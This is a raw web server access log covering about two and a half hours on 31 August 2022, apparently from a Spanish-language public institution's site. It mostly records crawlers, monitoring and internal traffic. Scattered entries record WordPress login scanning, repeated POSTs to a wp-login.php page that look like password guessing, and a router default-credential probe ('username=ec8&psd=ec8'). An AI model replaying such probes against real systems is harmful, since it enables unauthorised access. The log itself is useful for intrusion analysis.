157.55.39.80 - - [31/Aug/2022:02:14:51 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12505
66.249.73.127 - - [31/Aug/2022:02:16:35 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:02:16:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
207.46.13.16 - - [31/Aug/2022:02:16:41 -0500] "GET /BLA/resoluciones/852.tif HTTP/1.1" 404 1018
167.172.37.123 - - [31/Aug/2022:02:17:56 -0500] "GET / HTTP/1.1" 200 319
185.220.101.170 - - [31/Aug/2022:02:18:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [31/Aug/2022:02:18:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.81 - - [31/Aug/2022:02:18:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:02:17:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:02:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42326
201.245.192.253 - - [31/Aug/2022:02:20:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42776
172.22.2.4 - - [31/Aug/2022:02:18:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:02:21:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.97 - - [31/Aug/2022:02:22:14 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:02:23:30 -0500] "HEAD / HTTP/1.1" 200 -
45.55.135.165 - - [31/Aug/2022:02:24:24 -0500] "HEAD / HTTP/1.1" 200 -
45.55.135.165 - - [31/Aug/2022:02:24:24 -0500] "GET /wp-login.php HTTP/1.1" 404 1199
45.55.135.165 - - [31/Aug/2022:02:24:24 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1199
45.55.135.165 - - [31/Aug/2022:02:24:25 -0500] "GET /blog/wp-login.php HTTP/1.1" 404 1199
45.55.135.165 - - [31/Aug/2022:02:24:25 -0500] "GET /wp/wp-login.php HTTP/1.1" 404 1199
34.140.248.32 - - [31/Aug/2022:02:25:18 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [31/Aug/2022:02:23:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.141.148.183 - - [31/Aug/2022:02:25:38 -0500] "GET / HTTP/1.1" 200 4720
34.141.148.183 - - [31/Aug/2022:02:25:39 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [31/Aug/2022:02:24:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [31/Aug/2022:02:26:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:02:26:54 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2002%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:02:28:00 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 304 -
66.249.73.127 - - [31/Aug/2022:02:28:06 -0500] "-" 408 -
185.119.81.105 - - [31/Aug/2022:02:28:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [31/Aug/2022:02:28:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
216.245.221.92 - - [31/Aug/2022:02:28:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.234 - - [31/Aug/2022:02:28:45 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:02:30:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42326
201.245.192.253 - - [31/Aug/2022:02:30:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42776
172.22.2.4 - - [31/Aug/2022:02:29:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:02:31:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
207.46.13.186 - - [31/Aug/2022:02:31:41 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12505
207.46.13.16 - - [31/Aug/2022:02:31:52 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
207.46.13.36 - - [31/Aug/2022:02:31:56 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
157.55.39.45 - - [31/Aug/2022:02:32:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
157.55.39.45 - - [31/Aug/2022:02:32:02 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
157.55.39.8 - - [31/Aug/2022:02:32:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=AG8NJELjUAwhDyNJ+wceDOg0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
157.55.39.8 - - [31/Aug/2022:02:32:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=AG8NJELjUAwhDyNJ+wceDOg0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
172.22.2.4 - - [31/Aug/2022:02:30:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
216.245.221.92 - - [31/Aug/2022:02:33:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:33:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
66.249.73.127 - - [31/Aug/2022:02:34:35 -0500] "-" 408 -
207.46.13.36 - - [31/Aug/2022:02:35:46 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
201.245.192.253 - - [31/Aug/2022:02:36:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:02:35:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:36:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [31/Aug/2022:02:36:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52484
216.245.221.92 - - [31/Aug/2022:02:38:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.226 - - [31/Aug/2022:02:38:45 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:02:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42326
201.245.192.253 - - [31/Aug/2022:02:40:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42776
66.249.73.127 - - [31/Aug/2022:02:41:09 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:02:41:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:02:41:58 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 304 -
66.249.74.86 - - [31/Aug/2022:02:42:25 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:02:41:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Aug/2022:02:43:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:42:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:02:46:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.100 - - [31/Aug/2022:02:47:00 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [31/Aug/2022:02:47:01 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
40.77.139.36 - - [31/Aug/2022:02:47:51 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
40.77.139.36 - - [31/Aug/2022:02:47:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=AG8NJELjUAwhDyNJ+wceDOg0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
40.77.139.36 - - [31/Aug/2022:02:47:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=AG8NJELjUAwhDyNJ+wceDOg0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
40.77.139.36 - - [31/Aug/2022:02:47:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=AG8NJELjUAwhDyNJ+wceDOg0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
40.77.139.36 - - [31/Aug/2022:02:47:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=AG8NJELjUAwhDyNJ+wceDOg0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
66.249.73.127 - - [31/Aug/2022:02:47:52 -0500] "-" 408 -
40.77.139.36 - - [31/Aug/2022:02:47:52 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
40.77.139.36 - - [31/Aug/2022:02:47:52 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
40.77.139.36 - - [31/Aug/2022:02:47:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
40.77.139.36 - - [31/Aug/2022:02:47:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
216.245.221.92 - - [31/Aug/2022:02:48:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.252 - - [31/Aug/2022:02:48:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:02:47:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:47:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
112.46.68.45 - - [31/Aug/2022:02:51:20 -0500] "GET / HTTP/1.1" 400 946
201.245.192.253 - - [31/Aug/2022:02:51:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:02:53:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:52:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [31/Aug/2022:02:55:06 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:02:53:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
172.22.2.4 - - [31/Aug/2022:02:55:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:02:55:54 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [31/Aug/2022:02:55:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [31/Aug/2022:02:55:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [31/Aug/2022:02:56:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:02:58:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.33 - - [31/Aug/2022:02:58:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:02:58:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:58:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
172.22.2.4 - - [31/Aug/2022:02:59:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
201.245.192.253 - - [31/Aug/2022:03:01:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [31/Aug/2022:03:03:17 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:03:03:30 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.103 - - [31/Aug/2022:03:05:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [31/Aug/2022:03:05:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [31/Aug/2022:03:04:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:03:06:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:03:05:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
198.235.24.39 - - [31/Aug/2022:03:07:27 -0500] "\x16\x03\x01" 400 226
216.245.221.92 - - [31/Aug/2022:03:08:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.59 - - [31/Aug/2022:03:08:45 -0500] "-" 408 -
66.249.73.127 - - [31/Aug/2022:03:11:00 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:03:11:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:03:10:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:11:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [31/Aug/2022:03:13:30 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.80 - - [31/Aug/2022:03:13:45 -0500] "GET /Residuos/vehiculos/vehiculos.html HTTP/1.1" 200 1961
66.249.74.84 - - [31/Aug/2022:03:14:44 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:03:16:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [31/Aug/2022:03:16:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:03:16:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:18:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
216.245.221.92 - - [31/Aug/2022:03:18:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.30 - - [31/Aug/2022:03:18:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:03:17:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
201.245.192.253 - - [31/Aug/2022:03:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42322
201.245.192.253 - - [31/Aug/2022:03:20:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42620
201.245.192.253 - - [31/Aug/2022:03:21:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
157.55.39.8 - - [31/Aug/2022:03:22:09 -0500] "GET /bla/resoluciones/index.php?dir=resoluciones+2002/res+2002+751-800 HTTP/1.1" 200 12567
216.245.221.92 - - [31/Aug/2022:03:23:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:22:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:22:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
201.245.192.253 - - [31/Aug/2022:03:26:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:03:28:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.60 - - [31/Aug/2022:03:28:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:03:27:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:03:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42322
201.245.192.253 - - [31/Aug/2022:03:30:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42620
172.22.2.4 - - [31/Aug/2022:03:28:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55621
190.26.172.125 - - [31/Aug/2022:03:30:56 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:03:31:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [31/Aug/2022:03:31:59 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:03:33:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:33:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:34:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:03:36:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
139.59.183.38 - - [31/Aug/2022:03:36:32 -0500] "\x16\x03\x01" 400 226
139.59.183.38 - - [31/Aug/2022:03:36:33 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [31/Aug/2022:03:38:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.211 - - [31/Aug/2022:03:38:45 -0500] "-" 408 -
110.42.141.146 - - [31/Aug/2022:03:39:53 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [31/Aug/2022:03:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42322
201.245.192.253 - - [31/Aug/2022:03:40:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42620
172.22.2.4 - - [31/Aug/2022:03:40:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:03:40:53 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:03:39:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:03:41:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:03:40:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
216.245.221.92 - - [31/Aug/2022:03:43:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:41:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62371
201.245.192.253 - - [31/Aug/2022:03:46:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:03:45:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54347
172.22.2.4 - - [31/Aug/2022:03:45:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.83.13 - - [31/Aug/2022:03:47:57 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
172.22.2.4 - - [31/Aug/2022:03:46:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
66.249.73.127 - - [31/Aug/2022:03:48:18 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:03:48:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.207 - - [31/Aug/2022:03:48:46 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:03:51:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
77.88.5.208 - - [31/Aug/2022:03:52:30 -0500] "-" 408 -
93.158.161.34 - - [31/Aug/2022:03:52:35 -0500] "-" 408 -
77.88.5.39 - - [31/Aug/2022:03:52:41 -0500] "-" 408 -
77.88.5.215 - - [31/Aug/2022:03:52:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:03:51:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.37 - - [31/Aug/2022:03:53:01 -0500] "-" 408 -
77.88.5.24 - - [31/Aug/2022:03:53:16 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:03:53:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.168 - - [31/Aug/2022:03:53:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:03:52:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
77.88.5.27 - - [31/Aug/2022:03:54:46 -0500] "-" 408 -
77.88.5.6 - - [31/Aug/2022:03:55:46 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:03:56:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
157.55.39.8 - - [31/Aug/2022:03:56:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20350-399.TIF HTTP/1.1" 200 11619082
77.88.5.3 - - [31/Aug/2022:03:57:46 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:03:58:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:57:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:03:57:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
77.88.5.253 - - [31/Aug/2022:04:00:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:04:01:02 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [31/Aug/2022:04:01:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:01:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63198
216.245.221.92 - - [31/Aug/2022:04:03:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:02:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:03:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
77.88.5.174 - - [31/Aug/2022:04:05:46 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:04:06:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:04:08:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [31/Aug/2022:04:09:56 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [31/Aug/2022:04:08:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:04:11:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:09:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [31/Aug/2022:04:13:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.25 - - [31/Aug/2022:04:13:46 -0500] "-" 408 -
178.211.139.4 - - [31/Aug/2022:04:15:00 -0500] "-" 408 -
66.249.73.100 - - [31/Aug/2022:04:16:06 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:04:16:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:14:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:15:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
207.46.13.186 - - [31/Aug/2022:04:18:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 304 -
216.245.221.92 - - [31/Aug/2022:04:18:30 -0500] "HEAD / HTTP/1.1" 200 -
128.14.136.18 - - [31/Aug/2022:04:18:58 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
201.245.192.253 - - [31/Aug/2022:04:20:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42453
201.245.192.253 - - [31/Aug/2022:04:20:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42782
201.245.192.253 - - [31/Aug/2022:04:21:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:20:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:21:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [31/Aug/2022:04:23:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.241 - - [31/Aug/2022:04:23:46 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:04:26:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:04:26:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Aug/2022:04:28:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:27:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
201.245.192.253 - - [31/Aug/2022:04:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42453
201.245.192.253 - - [31/Aug/2022:04:30:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42782
201.245.192.253 - - [31/Aug/2022:04:31:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:04:33:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.157 - - [31/Aug/2022:04:33:46 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:04:32:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:33:56 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%205%20del%2012%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 431796
172.22.2.4 - - [31/Aug/2022:04:32:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:04:36:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
207.46.13.16 - - [31/Aug/2022:04:36:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20150-199.tif HTTP/1.1" 200 3922882
185.119.81.105 - - [31/Aug/2022:04:37:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [31/Aug/2022:04:37:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
157.50.56.62 - - [31/Aug/2022:04:37:52 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [31/Aug/2022:04:38:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:04:37:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:04:40:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42453
201.245.192.253 - - [31/Aug/2022:04:40:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42782
172.22.2.4 - - [31/Aug/2022:04:38:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53994
201.245.192.253 - - [31/Aug/2022:04:41:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
157.55.39.8 - - [31/Aug/2022:04:41:14 -0500] "GET /BLA/resoluciones/863.tif HTTP/1.1" 404 1018
216.245.221.92 - - [31/Aug/2022:04:43:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.55 - - [31/Aug/2022:04:43:46 -0500] "-" 408 -
190.180.154.168 - - [31/Aug/2022:04:44:34 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1019
103.61.102.140 - - [31/Aug/2022:04:44:56 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [31/Aug/2022:04:43:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
